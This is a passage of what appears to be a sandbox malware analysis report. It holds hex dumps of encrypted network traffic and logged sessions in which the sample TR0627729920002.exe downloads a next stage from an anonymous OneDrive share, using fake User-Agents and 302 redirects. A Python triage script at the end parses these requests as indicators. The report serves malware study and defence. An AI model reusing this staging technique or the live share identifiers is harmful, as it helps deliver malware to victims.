                                                                                                2022-08-08 18:12:31 UTC82INData Raw: 5f 6b cf a5 ee 90 b8 75 c1 cf cf 48 49 1b 03 ed ad ec ee 9b 21 92 70 aa 1f 31 5e c5 6f cd 67 62 06 5d 49 0f 4c 62 5a c2 46 25 2a 09 af 0f d4 fa 25 01 31 3f 5e 60 d7 75 ca 1b 2a f8 a8 d8 1f d4 0c fa 52 24 9d 16 d6 81 7d 1c 35 b8 3f 67 97 99 41 16 29 6d bc 74 58 04 f8 2f bd c3 56 19 39 aa 8a 93 d3 5d ab bb ce 18 3f e8 ab 61 54 f6 17 5f 36 bd 27 9e cd 63 bc 71 b4 83 c0 37 c4 6b 4d af 85 9c c2 25 b6 f9 51 1e d1 bd 5e 53 49 bc 59 de a8 f7 c4 da 4d db 76 43 e1 cb 34 5b 10 54 58 52 a9 ce 33 43 69 7c fd 5f be 5c d1 64 42 ce 23 e5 a8 d5 98 2d 50 54 4c bb 22 4d 33 5d e3 7c 89 02 62 95 56 4e 4e 83 2a b0 1b f5 45 0c 33 5a 45 a1 52 29 54 29 b6 0c 7b e9 67 35 31 62 60 c9 e5 3f c2 89 12 6b cd 42 14 92 8e c2 7e 09 3a aa e3 5b f4 67 1e 53 6f 06 fb 25 67 4e cd b9 56 d2 c4
                                                                                                Data Ascii: _kuHI!p1^ogb]ILbZF%*%1?^`u*R$}5?gA)mtX/V9]?aT_6'cq7kM%Q^SIYMvC4[TXR3Ci|_\dB#-PTL"M3]|bVNN*E3ZER)T){g51b`?kB~:[gSo%gNV
                                                                                                2022-08-08 18:12:31 UTC90INData Raw: 79 43 c6 d2 42 33 4f 28 54 a9 c0 55 86 0c c5 4f 1c 8c 2d 79 d0 62 c3 7a 69 7c b6 b2 60 03 d5 3f 42 c7 ca b1 bc 25 53 36 d1 9f 1f cc 8b 0f 2e 39 81 a0 8d a1 0e a9 23 12 43 18 73 0c fd 85 61 c3 15 10 51 2f 79 e4 cb 50 6a 96 74 21 33 25 37 4f 2a b0 a9 66 49 a7 ae 2f d0 36 aa 51 ce b0 31 be 2d b7 ac 41 b5 b0 da 28 52 42 21 72 79 f9 25 53 61 54 39 46 7d ad c4 8d 4f a8 0a 53 76 5f 54 d3 6c a0 eb c2 23 c6 31 1d 38 cf 05 66 42 27 19 de 46 c4 d6 47 4a d2 42 b0 27 41 a5 b8 d2 ce 2f 35 21 99 21 de 38 31 51 36 66 36 ac c5 ad cd 17 50 d6 36 97 5c 23 18 64 13 47 39 08 8c 35 53 48 c9 a2 20 43 6f ae 39 38 08 94 12 ee cf 9e c1 cb 49 b0 2f ca 43 3b b4 40 1d a4 b9 ec 0b 4c 52 fb 43 18 25 a2 20 43 66 49 a7 c9 3a c2 30 be 19 13 32 63 34 8d 0b c0 9e 7d 96 ba d5 3b 42 94 5e 49
                                                                                                Data Ascii: yCB3O(TUO-ybzi|`?B%S6.9#CsaQ/yPjt!3%7O*fI/6Q1-A(RB!ry%SaT9F}OSv_Tl#18fB'FGJB'A/5!!81Q6f6P6\#dG95SH Co98I/C;@LRC% CfI:02c4};B^I
                                                                                                2022-08-08 18:12:31 UTC98INData Raw: d1 aa b2 dd ae ba 52 d3 c6 ac 95 b7 c2 56 98 1f 92 b6 aa 4d 2a c9 53 36 d1 9f 1f 73 de fe a8 d8 a3 7b 88 05 7e 54 31 1f ba 36 33 35 47 40 b0 2f 31 b5 33 2b 79 e4 b6 45 b1 ba e0 b7 ba 19 46 cb cd b0 40 86 b6 2b bd bf a8 1d 0a 3a 27 bd a6 bc a6 1b a8 dc b5 58 da 28 52 42 21 d8 83 2e 00 c3 d7 92 5a 4e d5 08 13 8c 70 bd 1b bc 5a 38 b6 b6 ac a9 be 1d 7d e6 35 47 3a 23 dc 9b 2f 1b 2c 5a c1 c4 7e 74 21 37 c7 c3 1f 1d 10 ab bc c5 17 c2 8a 35 1d 43 38 bd 51 36 66 36 ac 70 f1 7d 96 17 6e d7 b4 b2 aa 08 e2 27 3a 27 49 9f 31 21 40 c5 cd 23 50 6e 2d 2d bd c5 b6 c6 1c 34 33 c1 9e 29 96 b6 23 49 9b bf 49 2c 4e 44 aa 5e e4 3d 88 6d e9 26 fb 01 ef cf b6 2f 2b 3a be 25 d6 38 b6 2d 2d b7 be be 18 c8 bc e4 b3 25 ca 42 1b b8 b1 cf d1 bc ce dd 29 a8 bf c5 31 d5 10 ab b4 5e 11
                                                                                                Data Ascii: RVM*S6s{~T1635G@/13+yEF@+:'X(RB!.ZNpZ8}5G:#/,Z~t!75C8Q6f6p}n':'I1!@#Pn--43)#II,ND^=m&/+:%8--%B)1^
                                                                                                2022-08-08 18:12:31 UTC106INData Raw: 68 c3 9e ed 29 36 a3 41 cc a2 a3 c8 31 9b 2f 83 de 18 b5 71 41 df 37 c6 d0 68 94 f9 2e c6 ae 5c fd 2e 3d d7 a4 c5 86 50 47 d1 6c 5c 9f 98 c2 a8 51 70 68 75 7c 1b 0e 84 da 72 ae c3 04 47 a0 bc d0 b8 13 04 3a f8 7d a5 cd 16 4f 2b 95 86 3d 8c 0e 27 63 21 a6 01 87 05 eb b6 47 4d bb 85 81 35 08 37 f9 48 d6 11 f6 cf 56 c9 50 44 96 07 2e df 3d da 83 20 e8 81 43 fd fb 9a 54 cf 96 e8 75 f9 52 06 00 34 df 23 d4 51 2c 91 0f 37 74 b2 d7 9d 7c e5 51 8a dd 0b cf 51 49 70 3a a6 e8 30 56 fc 29 dc 76 cc b4 28 dd ca 21 ad 89 1b 02 5e e8 c5 5f 54 22 89 b9 f0 9c 82 bc 91 a0 f0 55 f2 66 d9 5d cf 25 c7 6a be f8 ed 7a 54 ec 8f 36 b9 ef dc 07 14 ab c7 78 35 48 cc e1 29 83 26 49 79 72 b2 b5 1d 4f 21 55 3b 55 09 75 8c 3f 1b c6 5b 80 9b 53 42 ee b1 93 e4 86 fe ae 4d 32 c8 7c d9 62
                                                                                                Data Ascii: h)6A1/qA7h.\.=PGl\Qphu|rG:}O+='c!GM57HVPD.= CTuR4#Q,7t|QQIp:0V)v(!^_T"Uf]%jzT6x5H)&IyrO!U;Uu?[SBM2|b
                                                                                                2022-08-08 18:12:31 UTC114INData Raw: 78 82 6a 70 e9 f1 76 08 c9 30 cd 44 1b 1d 69 82 2a c1 cf c1 d6 55 1b 74 3b c3 bd 54 55 ca c2 27 fd fa bd cf c3 f3 76 23 cd 60 5c b7 c8 bc 1a e8 d7 04 c9 54 c1 66 99 53 27 0e 65 18 b9 9f cd 3a c7 49 9f d8 33 1c c4 19 e4 a9 5a d2 a1 10 13 ed b7 98 93 73 11 8a 70 8e 37 41 ea aa 4b ce c8 ae 4d b1 2d 92 12 51 bf 7f e6 cd 60 8c 08 dd be b0 f1 d1 49 b6 38 31 39 36 62 3f b7 d5 40 bf c5 c7 5c 60 66 41 27 54 cf d1 bf 27 49 93 c1 37 d4 c8 9c 0f 7e 39 4a e0 d6 d5 ce 39 bc e9 22 f7 66 7b 4e 82 2a b4 d8 42 c9 4d 51 f7 b9 54 c1 b2 00 da 46 f6 73 55 a9 15 f4 65 38 4e cd 60 f2 41 c4 16 dc 56 57 39 63 f4 45 a5 c7 5c d7 ee d0 27 54 cf 3d ac 02 e0 49 50 4e 54 49 e2 21 ba ee 07 64 bd a0 e6 89 49 cc 34 50 5a 54 aa 43 ae e5 51 0a 13 86 9f 15 a4 13 c0 0e 53 c7 c3 cb 5a 78 21 2d
                                                                                                Data Ascii: xjpv0Di*Ut;TU'v#`\TfS'e:I3Zsp7AKM-Q`I8196b?@\`fA'T'I7~9J9"f{N*BMQTFsUe8N`AVW9cE\'T=IPNTI!dI4PZTCQSZx!-
                                                                                                2022-08-08 18:12:31 UTC122INData Raw: 2d 70 da 40 c5 9c 3b 7d 39 52 4c 48 66 a9 46 5a 5c d5 80 86 ac 31 54 3a 5c d1 60 29 3b 4e 93 bf d3 52 49 4a 68 2d 3e 33 a1 c7 bf da 75 f7 33 ac 9b 49 9d c1 8a c5 c5 d7 b4 d2 c5 1e c9 bd c5 58 4a 3a 36 d1 c1 e6 fc db b2 ef ae 99 c7 c5 55 a9 d9 b6 21 6c de 99 c7 96 cb cd 5a 54 28 40 d3 4c bb ee e9 33 b0 c1 25 36 52 d3 48 b0 3b c3 20 bb cd 66 ca 21 7e b6 97 55 38 d3 c5 e6 f7 e7 b6 a8 95 be ab 56 0b 64 bd bf 5a cc a9 d3 d1 52 e0 ca c2 c7 c7 3d 5e c7 56 e0 f1 c1 54 48 b8 cc cd fe 7f e6 8d cd 4c 5e c8 49 e5 1d 7c 55 9d bd c5 d2 d1 6a c0 1f 84 1b b7 60 03 cd 66 bd c7 d8 b1 5e 60 bb 4f dd 33 23 1b dc 40 c9 cc a9 56 5e 5e 29 3b d1 12 c1 d3 d1 cc 10 dd ae 8f 31 b7 5e c7 ca fa 82 23 27 22 e0 b5 2d c7 c3 d1 d5 36 a9 5e c5 d1 6e d0 1d 91 55 19 1b 4c be b0 eb d8 a3 b6
                                                                                                Data Ascii: -p@;}9RLHfFZ\1T:\`);NRIJh->3u3IXJ:6U!lZT(@L3%6RH; f!~U8VdZR=^VTHL^I|Uj`f^`O3#@V^^);1^#'"-6^nUL
                                                                                                2022-08-08 18:12:31 UTC130INData Raw: c0 38 b2 99 27 60 bd ca 9b d1 5a 9f d3 e5 c0 2a 3f b5 c2 fb 50 60 c6 f0 d2 b0 5a 2b 55 c6 36 1d 8b 41 9d b2 bd c5 d8 2a 60 4c 9b 19 7c b0 7d bc b5 c4 0d 1f c9 e6 f4 7f d2 1f dc 9b c7 c5 a9 fa d9 b6 b2 3b b5 2d df 4f 2c c0 62 4c 31 42 62 bd 32 fe e9 b8 e5 41 3a d3 52 b3 47 7c b6 c0 3f b1 c0 4a 19 38 35 55 cf d1 32 59 dd b8 cd 3b 42 c5 cd 40 13 6e 37 37 b9 49 a5 21 4d d3 d1 2c ca dd ae bb 31 b7 93 11 6a 2c fb 11 4a 8c 0c 3d 5e c7 50 ab 53 4b a8 22 c8 b6 03 3a cd 60 d8 0c dd 1f 33 d4 34 21 d5 54 c1 fb 39 2a 5e 71 3a 66 54 08 d3 e7 be bb 0f 50 4e 54 9e 32 a7 4c 56 ad 75 e5 54 d3 c3 17 dc 49 c1 2b ee d6 d7 43 79 33 19 bf ae 56 4d 7d 6c e0 39 07 e5 4f e0 eb cc 47 74 49 49 f3 53 57 dd d6 d6 9c bd d5 de 8d 48 23 c1 dc 89 0f 2f d7 56 4e 8c b3 28 c2 49 a6 85 f8 f3
                                                                                                Data Ascii: 8'`Z*?P`Z+U6A*`L|};-O,bL1Bb2A:RG|?J85U2Y;B@n77I!M,1j,J=^PSK":`34!T9*^q:fTPNT2LVuTI+Cy3VM}l9OGtIISWH#/VN(I
                                                                                                2022-08-08 18:12:31 UTC138INData Raw: d7 de 8d ac 50 60 4a cd fd c7 bf 5e 0f 16 36 2f 65 40 c2 a8 23 e0 d1 e0 54 a9 a8 1a 38 02 42 aa 68 8b ee 8e f6 26 13 6c 3a 8d b5 8a a6 d8 d6 51 11 16 ad 2d 12 51 f5 61 2f 91 4d 4c 5e 11 22 e5 23 be d1 0f bd 90 ae 27 d6 36 52 64 11 31 78 ae da 13 56 4e d7 71 53 b0 7f dc 31 d6 ca 1b 79 c8 5c d1 2e 39 86 b8 ae 85 ce b5 4c d3 e5 10 f3 a8 bd 8a 8f ae 99 c7 c5 89 80 d9 54 12 e0 0c bc c7 96 18 49 a7 da 0b 93 0d bd f2 5d dc 16 92 c5 ec f2 3f 79 fd 64 f0 71 4d 16 a2 66 fe fe 4b 0a a0 d1 02 f2 c8 6e 8e bf 25 04 e0 72 03 56 ba 65 d0 ed 0d 52 c4 f2 dc e7 a4 c5 2f fe e2 6c 11 c7 35 e8 57 35 08 3f 4c 52 55 bd db 33 2f 33 52 9b 08 94 72 3a 88 91 f8 9c 15 bd d3 b2 ca 8b 4f c5 50 60 53 8b c9 f9 d1 49 48 a6 34 bf d3 c5 c9 c1 bf 25 d8 e4 89 a8 88 6d 43 d0 75 0d c3 43 d3 d1
                                                                                                Data Ascii: P`J^6/e@#T8Bh&l:Q-Qa/ML^"#'6Rd1xVNqS1y\.9LTI]?ydqMfKn%rVeR/l5W5?LRU3/3Rr:OP`SIH4%mCuC
                                                                                                2022-08-08 18:12:31 UTC146INData Raw: d3 98 5a 0f 4e 54 54 d0 4f 85 56 c6 64 fb 54 d3 c3 4d dc 18 c1 f9 c5 94 4e 5e c1 3b c8 0c c9 88 c1 a8 c3 bd c3 77 c8 0a 29 8d 02 bd cf 54 6b 3a 38 3d 8d 57 bd c5 dd 5b 6a c0 52 64 4a 38 de b1 c0 d7 56 bb 09 ab 28 33 bd d3 d0 9d c1 bf 68 65 f5 d1 bd 52 3e 9b d6 9c 62 ff 4c fd 60 50 cf a1 cc 16 cf 8c 5e ff 54 58 5e a9 3b 7b 4c 92 5e 8a 52 5a c9 2c 43 97 c5 41 bd 98 cd 60 5e ad ca 14 d3 9c d3 ff d5 54 54 34 39 24 66 15 bf 9e c5 5e d5 47 dc 0c 5a 8e bf 9c 54 5c 64 d0 39 97 64 fd c5 be c3 bd d7 51 ce 22 c5 23 bf c0 c1 cf c3 02 e6 93 c1 a8 52 dc c3 cf c3 88 e4 24 60 25 5e 55 d3 4c bb 13 de 93 ae f7 5f 62 c3 d7 fd 4b 42 50 60 76 91 7e b4 bf 66 bb c4 4f 38 be 54 cb 50 2f 3a 42 2f 62 4c 43 99 64 bd 68 76 6a 4c d3 d1 8c 5a 54 52 1f e0 79 5e 09 c5 15 cb 50 c5 b6 43
                                                                                                Data Ascii: ZNTTOVdTMN^;w)Tk:8=W[jRdJ8V(3heR>bL`P^TX^;{L^RZ,CA`^TT49$f^GZT\d9dQ"#R$`%^UL_bKBP`v~fO8TP/:B/bLCdhvjLZTRy^PC
                                                                                                2022-08-08 18:12:31 UTC154INData Raw: 07 bd 62 d5 c1 2c 42 50 8a d7 0c 53 c7 c5 86 ca d9 1d 21 54 de 9b c7 c3 cb b7 dc 2d 1e ca b2 81 d2 cd 60 cf c3 dd b4 be 4a 2d b5 c6 54 c1 64 56 2a a1 c7 bd 64 25 94 d1 bf d3 64 55 c0 0b c0 50 4d b0 10 3b cf d5 72 1e 7a 1b 1f 62 60 c5 cb 49 3f 38 d3 0c 53 c7 56 64 71 d9 19 c3 bd 56 5e 38 44 29 5e 15 e9 10 c4 aa 81 d2 74 4b cb 4c 7e 5e eb 48 a6 37 11 54 c1 ef 6c f5 2f b4 4e d7 50 cf 3d 43 34 b9 26 cc bf 56 48 09 78 21 37 0b d5 4c c1 62 ad ab 60 a4 1d cb c5 50 22 53 31 1e c8 25 95 57 50 c5 58 85 6a 37 25 52 5a c9 60 e0 2a 42 62 4e 52 a3 e9 29 4c 54 b9 d3 3d 34 c3 d5 c1 50 cc 3a e6 ff c7 bf 66 13 85 d1 4c 5e 93 82 23 4e 54 c1 cd a7 ab c7 cf 7a e6 dd 2b 21 bd 62 d5 c1 e4 42 c4 8a 4b d5 ae 7b c8 58 cb df 15 6a 25 1f cf 56 c7 cb 32 a7 ba 0b 29 0d 4e 8a 5c d4 5b
                                                                                                Data Ascii: b,BPS!T-`J-TdV*d%dUPM;rzb`I?8SVdqV^8D)^tKL~^H7Tl/NP=C4&VHx!7Lb`P"S1%WPXj7%RZ`*BbNR)LT=4P:fL^#NTz+!bBK{Xj%V2)N\[
                                                                                                2022-08-08 18:12:31 UTC162INData Raw: 12 52 5b c0 c8 cf 56 c5 c3 2a da 3c d7 60 be c5 69 99 9a 13 29 49 65 d3 c3 62 54 bf ca 0e 8b 65 8d 04 1e f8 66 54 5c d1 4b 62 54 5c cb 63 b1 3d cc d1 bd 50 54 cb b1 3d d3 c3 4a b9 6d ad 51 54 52 b9 c5 bf 2a 3d da 58 cb 50 54 84 3f 45 66 fd 43 cb cd d1 72 4d c6 6f 3a e9 d1 60 cb bb cf 52 9f 1c b2 c3 d5 52 58 cf 42 83 27 c7 bf 66 54 3a 36 7f 71 7f 5d c1 bf 56 c5 56 53 dc c7 cf d3 d5 c2 de ca bd 62 d7 cb ac b1 3b f4 d3 ca 6e 6d 86 2c 1a 4c 14 bf cc 4e 99 85 4e ba f5 93 0e 9b 48 48 0e 74 c5 88 03 a4 0d 95 18 f0 bd f0 b4 73 b5 b8 1f cd 66 c5 c7 52 47 bb 34 21 e7 08 8c a0 e3 88 f3 77 d0 e8 35 62 1a c1 fb c2 57 50 9c 45 e4 d3 8a 65 da 1b ff f4 e2 c6 d5 e0 b9 aa b7 1d fd 50 c8 08 69 19 9e a9 37 d1 a7 23 eb 68 1c 8c 9c 1a 90 8d e8 d2 4a a8 3d f8 22 d6 62 84 47 ed
                                                                                                Data Ascii: R[V*<`i)IebTefT\KbT\c=PT=JmQTR*=XPT?EfCrMo:`RRXB'fT:6q]VVSb;nm,LNNHHtsfRG4!w5bWPEePi7#hJ="bG
                                                                                                2022-08-08 18:12:31 UTC170INData Raw: c7 20 dc cb 4c 5a c5 eb 21 c3 de a3 a8 c1 d1 52 8d 99 40 bf 66 54 36 4d be 93 ca 62 7d d2 54 54 50 1d 74 1f bc 54 39 42 62 52 4c 83 4d c0 58 f8 02 d2 5e f2 5e c7 c5 74 55 c0 c5 3d 54 0e 53 56 52 54 c1 78 25 2d d5 ce 3a a9 a2 91 55 c5 79 d0 62 c3 4c 3d 7c a8 60 be b1 2f d7 56 bb 26 b3 28 a8 01 62 ca b6 7d d2 cd 40 5c d1 48 17 86 2d ae 19 2f c3 bd d7 91 3e 2c 27 d3 3b 28 c0 d2 42 b4 a6 1a ce bc 0e 41 52 5e 72 26 f3 b6 9b a6 ee 9e 31 4c 4e 5a c5 55 3a c5 4e 3d 67 eb 1f d5 54 56 54 a9 2a c4 56 4e 62 68 28 36 bf 60 e4 db d9 ac c5 c5 5e 5c 17 c7 cf 62 c9 ca a5 42 4c d3 d1 c1 f6 99 44 c7 4a 48 22 ca 54 58 c5 86 6c 1f 5c ac 99 25 52 5a c9 20 ab 99 c5 62 bd 9b e0 b0 1a d2 bd 81 de c3 62 cf 6c dd 19 33 66 41 a1 c7 bf 66 8f 53 b0 4c ee 04 57 50 5d 1d bd 13 a5 25 ba
                                                                                                Data Ascii: LZ!R@fT6Mb}TTPtT9BbRLMX^^tU=TSVRTx%-:UybL=|`/V&(b}@\H-/>,';(BAR^r&1LNZU:N=gTVT*VNbh(6`^\bBLDJH"TXl\%RZ bbl3fAfSLWP]%
                                                                                                2022-08-08 18:12:31 UTC186INData Raw: e0 20 ee 56 5e a3 a2 b3 d8 52 bf e8 37 d9 33 b6 c1 7f e2 50 cd 20 aa f1 5a c1 b3 21 0a b5 21 92 1b d3 13 a5 25 be d1 4f c9 3a c2 b2 7f 8e 43 3e 09 37 33 80 51 0a 2d 8d a0 82 a3 13 9e 96 54 cf d1 bf d3 c5 ba 2d 41 0c e7 a0 b0 bd 3b b2 18 d0 4b 62 c1 06 cd e9 ac 37 27 53 56 9a a8 66 19 40 c9 5a 21 b4 44 a9 c3 fc 33 7f e6 cd d3 d0 fd dd be ae d7 d0 36 5a 88 63 03 cf 5a de 7f 92 6a b5 94 17 cd 66 c7 bf 66 54 2f 1d 41 1a 15 78 8c 2f 54 c8 21 1c 41 d8 5e d7 77 4f 7a 1f b0 31 41 48 9e 1d bb 21 2a 50 5e 27 25 9f 9f c1 54 52 4c 6f 42 40 52 69 19 1c 41 5e 56 de 89 e7 c0 c2 5e 51 42 bd a6 dc 0d 50 4c c8 c4 1c 3b cd 66 27 33 d8 b1 cf 62 3f 8d dd c6 c1 bd 46 c5 20 53 21 56 5e 38 a5 ab a5 b0 b4 d3 d1 21 2b b3 46 bf cf 52 9d c7 2d 55 24 c1 54 b2 ac cc 9b c7 f0 c3 41 89
                                                                                                Data Ascii: V^R73P Z!!%O:C>73Q-T-A;Kb7'SVf@Z!D36ZcZjffT/Ax/T!A^wOz1AH!*P^'%TRLoB@RiA^V^QBPL;f'3b?F S!V^8!+FR-U$TA
                                                                                                2022-08-08 18:12:31 UTC202INData Raw: e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: y&&y]_ca&&y]]y


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49749 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
Timestamp | kBytes transferred | Direction | Data
2022-08-08 18:12:41 UTC | 203 | OUT | GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: wla42=
2022-08-08 18:12:42 UTC | 203 | IN | HTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6IbuXIZ_2I4C3PojU1dZgDhrXJBVB63YBUJKqqRkP-IEkzXLZw71Of_tNPTtLGQqfZOrHxLg61l9viQ3pKXrp-sUeAuTKn0iPy-2cfCXZbcG_ZGSYZuCyLvmDB04kuOcNBkhE8CTxnABbCHzCt4JBOlJw/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:41 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:42 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD0003FF11DA51
                                                                                                X-ODWebServer: centralus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 1D644258262448548D0F52989466A4E2 Ref B: VIEEDGE1607 Ref C: 2022-08-08T18:12:41Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:41 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49751 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
Timestamp | kBytes transferred | Direction | Data
2022-08-08 18:12:43 UTC | 204 | OUT | GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: 6
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
2022-08-08 18:12:43 UTC | 204 | IN | HTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB-APegcmQN7te3rF1BweJguh3qSXQtz5HjHD1Oeb1rhGAVZxlmJJDRuru-ZokmO3WslqCwp4uwH-0Bz-RAiuW8yOIz2aSjxSINj04gEiLnwj5gXsZIUGjF8OolqYoNBKg4xWUCyYnMRy1PGPoOtHn0Q/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:vGe+lml52og=:ZhqIJdNqImi1evTziB19nFgjLEd6fVisP0u5IpOTZD0=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:43 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:43 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D9975FB
                                                                                                X-ODWebServer: eastus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: AFD5B197D14F413AA0CBD099E840A394 Ref B: VIEEDGE1007 Ref C: 2022-08-08T18:12:43Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:43 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0
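The two sessions above show the sample fetching its next stage from an anonymous OneDrive share (cid/resid/authkey in the query string) with bogus User-Agent strings ("lVali", then "6") and being 302-redirected to a 1drv.com content host. The following is an added triage example written for this page, not code from the Joe Sandbox report or from any of the tools it names; the request and response texts are reconstructed from the session lines above (the Location header is shortened to its host and path tail), and the User-Agent heuristic is the editor's own choice.

```python
"""Triage the onedrive.live.com fetches recorded in sessions 4 and 5."""
from urllib.parse import parse_qs, urlsplit

# Constructed input: reconstructed from the session 4 and 5 request lines above.
REQUESTS = [
    "GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1\r\n"
    "User-Agent: lVali\r\n"
    "Host: onedrive.live.com\r\n"
    "Cookie: wla42=\r\n\r\n",
    "GET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1\r\n"
    "User-Agent: 6\r\n"
    "Host: onedrive.live.com\r\n"
    "Cookie: wla42=; xidseq=1\r\n\r\n",
]
# Constructed input: reconstructed from the session 4 response, Location shortened.
RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Cache-Control: no-cache, no-store\r\n"
    "Content-Type: text/html\r\n"
    "Location: https://2q5ira.ph.files.1drv.com/y4mAWAq.../Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1\r\n"
    "Content-Length: 0\r\n\r\n"
)

SHARE_PARAMS = ("cid", "resid", "authkey")


def parse_http_message(raw: str) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP/1.1 message into its start line and a lower-cased header map."""
    head = raw.partition("\r\n\r\n")[0]
    start_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start_line, headers


def triage_request(raw_request: str) -> dict:
    """Flag a non-browser User-Agent and an anonymous OneDrive share download."""
    start_line, headers = parse_http_message(raw_request)
    method, target, _version = start_line.split(" ", 2)
    host = headers.get("host", "")
    user_agent = headers.get("user-agent", "")
    url = urlsplit(f"https://{host}{target}")
    # parse_qs percent-decodes, so resid E0CF7F9E6AAF27EF%21235 becomes E0CF7F9E6AAF27EF!235
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    findings = []
    # Heuristic (editor's assumption): real browsers send a long Mozilla/-prefixed UA.
    if not user_agent.startswith("Mozilla/") or len(user_agent) < 10:
        findings.append(f"non-browser User-Agent {user_agent!r}")
    if host.endswith("onedrive.live.com") and url.path == "/download" \
            and all(p in query for p in SHARE_PARAMS):
        findings.append("anonymous OneDrive share download (cid/resid/authkey in query)")
    return {
        "method": method,
        "host": host,
        "user_agent": user_agent,
        "share": {p: query.get(p) for p in SHARE_PARAMS},
        "findings": findings,
    }


def triage_response(raw_response: str) -> dict:
    """Record the status and the host a redirect hands the client off to."""
    status_line, headers = parse_http_message(raw_response)
    status = int(status_line.split(" ")[1])
    redirect_host = urlsplit(headers.get("location", "")).hostname or ""
    findings = []
    if status in (301, 302, 303, 307, 308) and redirect_host.endswith(".1drv.com"):
        findings.append(f"redirect to OneDrive content host {redirect_host}")
    return {"status": status, "redirect_host": redirect_host, "findings": findings}


def share_iocs(raw_requests: list[str]) -> set[tuple[str, str, str]]:
    """Deduplicate (host, resid, authkey) across sessions for blocking and hunting."""
    iocs = set()
    for raw in raw_requests:
        info = triage_request(raw)
        share = info["share"]
        if share["resid"] and share["authkey"]:
            iocs.add((info["host"], share["resid"], share["authkey"]))
    return iocs


if __name__ == "__main__":
    for raw in REQUESTS:
        print(triage_request(raw))
    print(triage_response(RESPONSE))
    print(share_iocs(REQUESTS))
```

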